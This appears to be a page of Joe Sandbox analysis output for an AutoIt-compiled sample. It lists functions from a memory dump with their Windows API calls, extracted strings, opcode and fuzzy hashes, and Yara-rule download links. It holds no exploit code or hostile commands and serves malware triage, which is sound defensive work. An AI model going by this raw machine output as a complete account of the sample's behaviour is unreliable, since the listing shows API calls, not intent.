Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f3c51060c22c3ba37f71007f7b5785cb73516826ea7abb2e9ede62c51deb0207
Instruction ID: 41811a70889f9b3267b1bf7a860ee2c807a16c0e5f69283d45146ccba6ba8024
Opcode Fuzzy Hash: f3c51060c22c3ba37f71007f7b5785cb73516826ea7abb2e9ede62c51deb0207
Instruction Fuzzy Hash: EBF05E36540613ABD7212B64ED4C9EAB72AEF55722B100622F683E10A8CBBF5805DB50

Function 00FE8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FE899D
UnloadUserProfile.USERENV(?,?), ref: 00FE89A9
CloseHandle.KERNEL32(?), ref: 00FE89B2
CloseHandle.KERNEL32(?), ref: 00FE89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00FE89C3
HeapFree.KERNEL32(00000000), ref: 00FE89CA

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6e4d38604d2b62773bfd6a0b74f3f31e73e02f4e4739f91c632e0358e6d82261
Instruction ID: 77187c5b7678651b70aa12be71918144b8a54512a7ef459dbd315f2e6e20cb8b
Opcode Fuzzy Hash: 6e4d38604d2b62773bfd6a0b74f3f31e73e02f4e4739f91c632e0358e6d82261
Instruction Fuzzy Hash: 28E0E536104402BBDB112FE1EC0C90ABF79FF8A322B108220F259C1078CB3F9428DB50

Function 010085ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01008613
CharUpperBuffW.USER32(?,?), ref: 01008722
VariantClear.OLEAUT32(?), ref: 0100889A

Part of subcall function 00FF7562: VariantInit.OLEAUT32(00000000), ref: 00FF75A2
Part of subcall function 00FF7562: VariantCopy.OLEAUT32(00000000,?), ref: 00FF75AB
Part of subcall function 00FF7562: VariantClear.OLEAUT32(00000000), ref: 00FF75B7

Strings

AUTOIT.ERROR, xrefs: 01008728
Incorrect Parameter format, xrefs: 0100864B, 0100880D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 910bfb3f8ee198ceacb7552b0455836b014918c541d4c570d9f1551839c51228
Instruction ID: 7ed3773376f30313b5c8ffd4d3abd6fd9b443c45116cb809676e406601ed9263
Opcode Fuzzy Hash: 910bfb3f8ee198ceacb7552b0455836b014918c541d4c570d9f1551839c51228
Instruction Fuzzy Hash: F691A270A08301DFDB11DF29C88495ABBE4FF89714F04896EF98A8B391DB35E905CB51

Function 00FF2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

_memset.LIBCMT ref: 00FF2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FF2C97

Strings

0, xrefs: 00FF2B73

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 9519e858c82a2e4c2d5b4336bf8d06f1de9e243314ad6cc671c640fad9485807
Instruction ID: e0351c641c03a65669dc94a72792e7a88833fee4f5aa778809063e6de170d055
Opcode Fuzzy Hash: 9519e858c82a2e4c2d5b4336bf8d06f1de9e243314ad6cc671c640fad9485807
Instruction Fuzzy Hash: 4A51F1719083059ED7A49E28D845A7F77E4EF85330F040A2DFA94D71E0DB78CD04AB52

Function 00FED56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FED5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FED60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FED61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FED69D

Strings

DllGetClassObject, xrefs: 00FED610

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f9bbaf1e807beb6c0b5e88ae28600fa922d913d8034ca2c4953e1ca56c470264
Instruction ID: d17489382af43859957267a1d406f51755b80e9f3fa0fa16131d7d62fa3aba1f
Opcode Fuzzy Hash: f9bbaf1e807beb6c0b5e88ae28600fa922d913d8034ca2c4953e1ca56c470264
Instruction Fuzzy Hash: C541E1B1600204EFDB14CF66C884B9A7BB9EF44314F1581ADEC099F205D7B6DD44EBA0

Function 00FF2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FF27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00FF2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01055890,00000000), ref: 00FF286B

Strings

0, xrefs: 00FF27B5

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3e55eef1e7b945dc729a01d38dac7dbaf8d91483bd6fac197360dfcee20ffe8e
Instruction ID: 3e45c7732908652db415a559a62e54f1c7d501d9ba60acbe210bde7566d255d0
Opcode Fuzzy Hash: 3e55eef1e7b945dc729a01d38dac7dbaf8d91483bd6fac197360dfcee20ffe8e
Instruction Fuzzy Hash: 3941F0706043059FDB60DF24CC84B6ABBE8EF85764F04492EFAA5972E1C734E804DB52

Function 0100D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0100D7C5

Part of subcall function 00F9784B: _memmove.LIBCMT ref: 00F97899

Strings

stdcall, xrefs: 0100D847
none, xrefs: 0100D8A0
cdecl, xrefs: 0100D81C
winapi, xrefs: 0100D836

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 752bfbdd5ac7801fc7840f03cfe792b086325f2b1f1107390b3d69dea833f500
Instruction ID: 394a1f0d3fcfcab8be08bd3d7a95e211d211a23b164d22d2ac0e2474334b465c
Opcode Fuzzy Hash: 752bfbdd5ac7801fc7840f03cfe792b086325f2b1f1107390b3d69dea833f500
Instruction Fuzzy Hash: 3031D670900205ABEF01EF99CC519FEB3B4FF04320F108A69E8A9972C1DB35EA05CB90

Function 00FE8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FE8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FE8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00FE8F57

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Strings

ComboBox, xrefs: 00FE8E9E
ListBox, xrefs: 00FE8ED3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 0dcd699e7a895fcf81a2187909b20c1225ba3c7785fa51dd30e73586a57726a9
Instruction ID: b1456aed877b63a0a3d4e6eaf3c8b33fe528bf3bc1c1e337cc1be872aa8c0261
Opcode Fuzzy Hash: 0dcd699e7a895fcf81a2187909b20c1225ba3c7785fa51dd30e73586a57726a9
Instruction Fuzzy Hash: 9521EE71A00244BAEF24BBB1DC859FFB769DF053A0F044529F429971E0DF3D480AAA10

Function 0100182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0100184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01001872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010018A2
InternetCloseHandle.WININET(00000000), ref: 010018E9

Part of subcall function 01002483: GetLastError.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 01002498
Part of subcall function 01002483: SetEvent.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 010024AD

Strings

, xrefs: 01001893

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 53ead88fdda718209e2b421ce429754cc51a2739c7836c18faa683a42b13c41b
Instruction ID: 18c2b4f20f18ecb7640102d7dd0a03c991df60f8b5e0ca86c0c3302761f2f73d
Opcode Fuzzy Hash: 53ead88fdda718209e2b421ce429754cc51a2739c7836c18faa683a42b13c41b
Instruction Fuzzy Hash: 9121AFB1500209BFFB229A64DC84EBF77EDFB48754F00412AF585D2180DB75CE0457A1

Function 010163E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F91D73
Part of subcall function 00F91D35: GetStockObject.GDI32(00000011), ref: 00F91D87
Part of subcall function 00F91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F91D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01016461
LoadLibraryW.KERNEL32(?), ref: 01016468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0101647D
DestroyWindow.USER32(?), ref: 01016485

Strings

SysAnimate32, xrefs: 0101643C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: bce0d349c4eb97249dd59ffc94ac0b008ba18583e0c25295032b7ba9d615197b
Instruction ID: a265100c1ba8ec8b686f700230d2fe4f4355a6fd5c19b1cbf62b5f6305230bdb
Opcode Fuzzy Hash: bce0d349c4eb97249dd59ffc94ac0b008ba18583e0c25295032b7ba9d615197b
Instruction Fuzzy Hash: 9921A471140205BFEF118EA8DC40EBB77EEEF49368F104669FA9093099DBBADC419760

Function 00FF6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00FF6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF6DEF
GetStdHandle.KERNEL32(0000000C), ref: 00FF6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FF6E3B

Strings

nul, xrefs: 00FF6E36

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: aa062eebfca94e259d6acdcef7c6365645722f6039646076b2a7d9bdda2c57fe
Instruction ID: b2b69d4f6d93f325ad225e8552e66e5dd747d282486f18ac951c0d97700573ae
Opcode Fuzzy Hash: aa062eebfca94e259d6acdcef7c6365645722f6039646076b2a7d9bdda2c57fe
Instruction Fuzzy Hash: 4B21A175A0020EABDB209F29D804AAE77B4EF44730F204A19FEE0D72E0DB719815AB54

Function 00FF6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FF6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF6EBB
GetStdHandle.KERNEL32(000000F6), ref: 00FF6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FF6F06

Strings

nul, xrefs: 00FF6F01

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3f958ea31eb3ee77a3ffc16708b682fd35f0e77602ef278e4ea0f81a67d58bd7
Instruction ID: 84d516003f8239a5bcff930e25a66f56ddf71e93a11c0800c350a15a72ff5665
Opcode Fuzzy Hash: 3f958ea31eb3ee77a3ffc16708b682fd35f0e77602ef278e4ea0f81a67d58bd7
Instruction Fuzzy Hash: 172195769003099BDB209F69D804ABA77A4AF55730F200A19FEE0D72E0DB759850DB54

Function 00FFAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FFACA8
__swprintf.LIBCMT ref: 00FFACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0101F910), ref: 00FFACFF

Strings

%lu, xrefs: 00FFACBB

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1614cc9b81718b3439a29466c30722d2112f81134527eef409c8f82810c1114c
Instruction ID: d7a8ea822ac7457ae0cf6434571b3bd69f765e2a256b8b94062aa0ca8dcc9f34
Opcode Fuzzy Hash: 1614cc9b81718b3439a29466c30722d2112f81134527eef409c8f82810c1114c
Instruction Fuzzy Hash: 5821A170A00109AFDB10DF69CD45DEE7BB8EF49314B004069F909DB251DA79EA05DB21

Function 00FF1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FF1B19

Strings

EXISTS, xrefs: 00FF1B41
APPEND, xrefs: 00FF1B52
REMOVE, xrefs: 00FF1B1F
KEYS, xrefs: 00FF1B30

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: a7e5170feb154c80acabebc0e927df7759137077980411b3c34c412326e8b29e
Instruction ID: a96eae2270c4e5068409c3a48e76016af705188ae03629e04b66ca28783ace13
Opcode Fuzzy Hash: a7e5170feb154c80acabebc0e927df7759137077980411b3c34c412326e8b29e
Instruction Fuzzy Hash: 9F118E70900209CF8F00FFA4D8A19FEB3B4FF65704B1088A5D954672A6EB365D06EF40

Function 0100EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0100EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0100EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0100ED6A
CloseHandle.KERNEL32(?), ref: 0100EDEB

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 52fe70af48da804fe7064ecb26992922094885e0ed567f817ea58b170faca15d
Instruction ID: f770c8d31f4f4544cc736257eb5c73a37f509ed6352a0a71c2ca50b8b227651c
Opcode Fuzzy Hash: 52fe70af48da804fe7064ecb26992922094885e0ed567f817ea58b170faca15d
Instruction Fuzzy Hash: F08171716047009FEB61EF28CC46F2AB7E5AF84710F44881DF999DB2D2DAB5AC41CB91

Function 01010037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010100FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01010183
RegCloseKey.ADVAPI32(?,?), ref: 010101AF
RegCloseKey.ADVAPI32(00000000), ref: 010101BC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 678c911e91bd782a1cc9bfbc32e2280e117cf9403518af23e77ad31f0234c366
Instruction ID: 1ff9f3479479f57127de54f9fd2ee6d63d633945437acab46acb60701f9172b6
Opcode Fuzzy Hash: 678c911e91bd782a1cc9bfbc32e2280e117cf9403518af23e77ad31f0234c366
Instruction Fuzzy Hash: 10517731208305AFEB14EF68CC81E6AB7E8FF84314F00881DF58587295DB39E948CB52

Function 0100D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0100D927
GetProcAddress.KERNEL32(00000000,?), ref: 0100D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0100D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0100DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0100DA21

Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7896,?,?,00000000), ref: 00F95A2C
Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7896,?,?,00000000,?,?), ref: 00F95A50

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
